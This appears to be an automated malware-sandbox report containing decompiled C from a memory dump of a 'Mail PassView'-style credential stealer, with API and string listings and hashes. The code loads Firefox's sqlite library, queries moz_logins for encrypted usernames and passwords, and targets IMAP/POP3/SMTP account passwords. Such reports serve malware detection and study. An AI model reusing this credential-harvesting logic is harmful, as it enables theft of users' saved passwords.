                                                                        0x00410a68
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00410a68
                                                                        0x00410a57
                                                                        0x00410a89

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcmp$_stricmp$memcpystrlen
                                                                        • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                        • API String ID: 1113949926-2499304436
                                                                        • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                        • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                        • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                        • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F64B, Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127libraryloaderstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t79 = "sqlite3.dll";
					_t45 = GetModuleHandleA(_t79);
					 *(_t81 + 0x24) = _t45;
					if(_t45 != 0) {
						goto L12;
					}
					_t57 = LoadLibraryA(_t79);
					goto L11;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					if(E0040614B( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
					}
					_t68 = GetModuleHandleA( &_v284);
					 *(_t81 + 0x24) = _t68;
					if(_t68 != 0) {
						L12:
						_t46 =  *(_t81 + 0x24);
						if(_t46 == 0) {
							return 0;
						}
						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
						goto L14;
					} else {
						_t57 = LoadLibraryExA( &_v284, 0, 8);
						L11:
						 *(_t81 + 0x24) = _t57;
						goto L12;
					}
				}
			}













                                                                        0x0040f64b
                                                                        0x0040f65b
                                                                        0x0040f7e1
                                                                        0x00000000
                                                                        0x0040f7e3
                                                                        0x0040f66e
                                                                        0x0040f674
                                                                        0x0040f685
                                                                        0x0040f694
                                                                        0x0040f687
                                                                        0x0040f68b
                                                                        0x0040f691
                                                                        0x0040f69f
                                                                        0x0040f741
                                                                        0x0040f747
                                                                        0x0040f74f
                                                                        0x0040f752
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040f755
                                                                        0x00000000
                                                                        0x0040f6a5
                                                                        0x0040f6b2
                                                                        0x0040f6b8
                                                                        0x0040f6cb
                                                                        0x0040f6dc
                                                                        0x0040f6f2
                                                                        0x0040f702
                                                                        0x0040f713
                                                                        0x0040f718
                                                                        0x0040f722
                                                                        0x0040f72a
                                                                        0x0040f72d
                                                                        0x0040f75e
                                                                        0x0040f75e
                                                                        0x0040f763
                                                                        0x00000000
                                                                        0x0040f7ea
                                                                        0x0040f77f
                                                                        0x0040f78b
                                                                        0x0040f798
                                                                        0x0040f7a5
                                                                        0x0040f7b2
                                                                        0x0040f7bf
                                                                        0x0040f7cc
                                                                        0x0040f7d9
                                                                        0x0040f7de
                                                                        0x00000000
                                                                        0x0040f72f
                                                                        0x0040f739
                                                                        0x0040f75b
                                                                        0x0040f75b
                                                                        0x00000000
                                                                        0x0040f75b
                                                                        0x0040f72d

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F674
                                                                        • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                        • memset.MSVCRT ref: 0040F6B8
                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                        • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                        • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                        • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                        • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                        • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                        • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                        • API String ID: 3567885941-2042458128
                                                                        • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                        • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                        • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                        • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                                        0x0040e4a4
                                                                        0x0040e4a7
                                                                        0x0040e4af
                                                                        0x0040e4cd
                                                                        0x0040e4db
                                                                        0x0040e4e8
                                                                        0x0040e4f4
                                                                        0x0040e4fd
                                                                        0x0040e509
                                                                        0x0040e515
                                                                        0x0040e51f
                                                                        0x0040e52a
                                                                        0x0040e53e
                                                                        0x0040e54c
                                                                        0x0040e55d
                                                                        0x0040e561
                                                                        0x0040e566
                                                                        0x0040e575
                                                                        0x0040e581
                                                                        0x0040e585
                                                                        0x0040e58d
                                                                        0x0040e591
                                                                        0x0040e629
                                                                        0x0040e62c
                                                                        0x0040e638
                                                                        0x0040e746
                                                                        0x0040e74b
                                                                        0x0040e757
                                                                        0x0040e75b
                                                                        0x0040e769
                                                                        0x0040e780
                                                                        0x0040e78a
                                                                        0x0040e7d0
                                                                        0x0040e7da
                                                                        0x0040e819
                                                                        0x0040e819
                                                                        0x0040e649
                                                                        0x0040e65a
                                                                        0x0040e65e
                                                                        0x0040e662
                                                                        0x0040e66a
                                                                        0x0040e69c
                                                                        0x0040e6cc
                                                                        0x0040e6e3
                                                                        0x0040e6e8
                                                                        0x0040e6f7
                                                                        0x0040e715
                                                                        0x0040e726
                                                                        0x0040e72b
                                                                        0x0040e72f
                                                                        0x0040e73a
                                                                        0x00000000
                                                                        0x0040e662
                                                                        0x0040e59a
                                                                        0x0040e59c
                                                                        0x0040e5a6
                                                                        0x0040e5aa
                                                                        0x0040e610
                                                                        0x0040e614
                                                                        0x0040e619
                                                                        0x0040e61d
                                                                        0x0040e621
                                                                        0x0040e623
                                                                        0x00000000
                                                                        0x0040e623
                                                                        0x0040e5b3
                                                                        0x0040e5b7
                                                                        0x0040e5de
                                                                        0x0040e5e7
                                                                        0x0040e5ee
                                                                        0x0040e5f0
                                                                        0x0040e5f0
                                                                        0x0040e5ee
                                                                        0x0040e5f4
                                                                        0x0040e5ff
                                                                        0x0040e604
                                                                        0x0040e60c
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                        • String ID: %s:$EDIT$STATIC
                                                                        • API String ID: 1703216249-3046471546
                                                                        • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                        • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                        • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                        • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}


























                                                                        0x004010e5
                                                                        0x004010e8
                                                                        0x004010e9
                                                                        0x004010ed
                                                                        0x004010f5
                                                                        0x004010f7
                                                                        0x004012b2
                                                                        0x004012b9
                                                                        0x004012f4
                                                                        0x004012bb
                                                                        0x004012d4
                                                                        0x004012e3
                                                                        0x004012e3
                                                                        0x00401302
                                                                        0x0040131a
                                                                        0x0040132b
                                                                        0x0040132d
                                                                        0x00401335
                                                                        0x00000000
                                                                        0x004010fd
                                                                        0x004010fd
                                                                        0x004010fe
                                                                        0x0040127d
                                                                        0x00401280
                                                                        0x00401284
                                                                        0x00000000
                                                                        0x0040128a
                                                                        0x0040128d
                                                                        0x00401290
                                                                        0x00000000
                                                                        0x00401296
                                                                        0x0040129b
                                                                        0x004012a7
                                                                        0x00000000
                                                                        0x004012a7
                                                                        0x00401290
                                                                        0x00401104
                                                                        0x00401104
                                                                        0x00401107
                                                                        0x0040122e
                                                                        0x00401230
                                                                        0x00401233
                                                                        0x0040125b
                                                                        0x00401262
                                                                        0x00000000
                                                                        0x00401268
                                                                        0x00401270
                                                                        0x00401272
                                                                        0x00401275
                                                                        0x00000000
                                                                        0x0040127b
                                                                        0x00000000
                                                                        0x0040127b
                                                                        0x00401275
                                                                        0x00401235
                                                                        0x00401235
                                                                        0x0040123a
                                                                        0x00401248
                                                                        0x00401250
                                                                        0x00401250
                                                                        0x0040110d
                                                                        0x0040110d
                                                                        0x00401112
                                                                        0x004011a2
                                                                        0x004011ab
                                                                        0x004011b9
                                                                        0x004011bc
                                                                        0x004011bf
                                                                        0x004011c1
                                                                        0x004011c4
                                                                        0x004011d1
                                                                        0x004011d3
                                                                        0x004011d6
                                                                        0x004011f2
                                                                        0x004011f9
                                                                        0x00000000
                                                                        0x004011ff
                                                                        0x00401207
                                                                        0x00401209
                                                                        0x00401214
                                                                        0x00401216
                                                                        0x00401218
                                                                        0x00000000
                                                                        0x0040121e
                                                                        0x00000000
                                                                        0x0040121e
                                                                        0x00401218
                                                                        0x004011d8
                                                                        0x004011d8
                                                                        0x004011e7
                                                                        0x00000000
                                                                        0x004011e7
                                                                        0x00401118
                                                                        0x0040111a
                                                                        0x0040133b
                                                                        0x0040133b
                                                                        0x0040133b
                                                                        0x00401120
                                                                        0x00401120
                                                                        0x00401129
                                                                        0x00401137
                                                                        0x0040113a
                                                                        0x0040113d
                                                                        0x0040113f
                                                                        0x00401142
                                                                        0x00401154
                                                                        0x0040116f
                                                                        0x00401176
                                                                        0x00000000
                                                                        0x0040117c
                                                                        0x00401184
                                                                        0x00401186
                                                                        0x00401191
                                                                        0x00401193
                                                                        0x00401195
                                                                        0x00000000
                                                                        0x0040119b
                                                                        0x0040119b
                                                                        0x00000000
                                                                        0x0040119b
                                                                        0x00401195
                                                                        0x00401156
                                                                        0x0040115c
                                                                        0x0040115d
                                                                        0x0040115d
                                                                        0x00401160
                                                                        0x00401167
                                                                        0x00401169
                                                                        0x00401169
                                                                        0x00401154
                                                                        0x0040111a
                                                                        0x00401112
                                                                        0x00401107
                                                                        0x004010fe
                                                                        0x00401341

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                        • String ID: Mail PassView
                                                                        • API String ID: 3628558512-272225179
                                                                        • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                        • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                        • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                        • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040CE28, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
					} else {
						_v12 = _t196;
						_v1380 = _t196;
						memset( &_v1378, _t196, 0x208);
						_v852 = _t196;
						memset( &_v851, _t196, 0x104);
						_t239 = _t238 + 0x18;
						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
						if(_v72 != _t196) {
							_v72( &_v852,  &_v12);
						}
						if(_v12 == _t196) {
							goto L39;
						}
						_a8 = _t196;
						if(_v68 != _t196) {
							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
							_t239 = _t239 + 0x14;
						}
						L11:
						L11:
						if(_v64 == _t196) {
							_t130 = 0xffff;
						} else {
							_t130 = _v64(_a8);
						}
						if(_t130 != 0x64) {
							goto L34;
						}
						_v8756 = _t196;
						memset( &_v8755, _t196, 0x3ff);
						memset( &_v7732, _t196, 0x1400);
						_t240 = _t239 + 0x18;
						_t235 = E0040F7EE( &_v72, _a8, 1);
						_v20 = E0040F7EE( &_v72, _a8, 6);
						_v8 = E0040F7EE( &_v72, _a8, 7);
						_v24 = E0040F7EE( &_v72, _a8, 4);
						_v32 = E0040F7EE( &_v72, _a8, 5);
						_v16 = E0040F7EE( &_v72, _a8, 2);
						if(_t235 != _t196) {
							strcpy( &_v8756, _t235);
						}
						if(_v20 != _t196) {
							strcpy( &_v7732, _v20);
						}
						if(_v8 != _t196) {
							strcpy( &_v6708, _v8);
						}
						if(_v24 != _t196) {
							strcpy( &_v5684, _v24);
						}
						if(_v32 != _t196) {
							strcpy( &_v4660, _v32);
						}
						if(_v16 != _t196) {
							strcpy( &_v3636, _v16);
						}
						_v332 = _t196;
						memset( &_v331, _t196, 0xff);
						_v588 = _t196;
						memset( &_v587, _t196, 0xff);
						_t239 = _t240 + 0x18;
						E0040CD27(_v8, _t226,  &_v588);
						E0040CD27(_v20, _t226,  &_v332);
						_v8 = _t196;
						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
							_v16 = _t226 + 0x468;
							do {
								_t237 = E0040D438(_v8, _v16);
								_v2612 = _t196;
								memset( &_v2611, _t196, 0x261);
								_v1996 = _t196;
								memset( &_v1995, _t196, 0x261);
								_t86 = _t237 + 0x104; // 0x104
								_t229 = _t86;
								sprintf( &_v2612, "mailbox://%s", _t229);
								sprintf( &_v1996, "imap://%s", _t229);
								_push( &_v3636);
								_t170 =  &_v2612;
								_push(_t170);
								L004115B2();
								_t239 = _t239 + 0x38;
								if(_t170 == 0) {
									L31:
									_t94 = _t237 + 0x304; // 0x304
									E004060D0(0xff, _t94,  &_v588);
									_t96 = _t237 + 0x204; // 0x204
